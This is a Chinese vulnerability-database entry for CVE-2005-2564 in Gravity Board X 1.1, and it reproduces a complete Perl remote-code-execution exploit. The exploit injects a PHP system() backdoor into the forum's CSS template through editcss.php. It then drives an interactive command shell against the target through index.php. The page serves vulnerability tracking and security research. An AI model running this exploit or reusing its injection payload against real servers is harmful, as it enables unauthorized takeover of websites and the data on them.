Gravity Board X 'editcss.php' 静态代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109772 漏洞类型 未知
发布时间 2006-02-17 更新时间 2006-02-17
CVE编号 CVE-2005-2564 CNNVD-ID CNNVD-200508-128
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1510
https://www.securityfocus.com/bid/89399
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-128
|漏洞详情
GravityBoardX(GBX)1.1中的editcss.php页面存在直接静态代码注入漏洞。这使得远程攻击者可以借助于csscontent参数直接执行任意PHP代码、HTML或脚本(直接插入到gbxfinal.css文件中)。
|漏洞EXP
#!/usr/bin/perl

## Gravity Board X v1.1 (possibly prior versions) remote code execution exploit
## (c)oded by 1dt.w0lf
## 14.08.2005
## RST/GHC
## http://rst.void.ru
## http://ghc.ru

use LWP::UserAgent;

if(@ARGV<1) { &usage; exit(0); }

$path = $ARGV[0];
header();
print "Creating shell... Please wait\n";

$gr = LWP::UserAgent->new() or die;
$res = $gr->get($path.'editcss.php?csscontent=</style><?php error_reporting(0); system($HTTP_POST_VARS[cmd]); ?>');
if($res->as_string =~ /unable to save changes/)
 {
 print "Forum unable to save changes in css template. Exploitation failed.\n";
 exit(0);
 }
print "DONE.\n";

while ()
 {
    print "Type command for execute or 'q' for exit\nGravity# ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'q');
        last;
     }
    &run($cmd);
 }

sub run()
 {
 $cmd2  = 'echo 1 && echo _START_ && ';
 $cmd2 .= $cmd;
 $cmd2 .= ' && echo _END_';
 $gr = LWP::UserAgent->new() or die;
 $res = $gr->post($path.'index.php',{"cmd" => "$cmd2"});   
 @result = split(/\n/,$res->content);
 $runned = 0;
 $on = 0;
 print "\n";
 for $res(@result)
  {
    if ($res =~ /^_END_/) { print "\n"; return 0; }
    if ($on == 1) { print "  $res\n"; }
    if ($res =~ /^_START_/) { $on = 1; $runned = 1; } 
  }
 print "Can't execute command\n" if !$runned;
 }

sub header()
{
 print "--* Gravity Board X v1.1 exploit by RST/GHC\n";
 print "--* keep it private, not for public\n";
}

sub usage()
 {
  header();
  print "usage : r57Gravity.pl [path_to_forum]\n";
  print "  e.g.: r57Gravity.pl http://127.0.0.1/forum/\n";
 }

# milw0rm.com [2006-02-17]
|受影响的产品
Gravity Board X Development Team Gravity Board X 1.1
|参考资料

来源:XF
名称:gravityboardx-template-xss(21742)
链接:http://xforce.iss.net/xforce/xfdb/21742
来源:BUGTRAQ
名称:20050807GravityBoardXv1.1multiplevulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112351740803443&w=2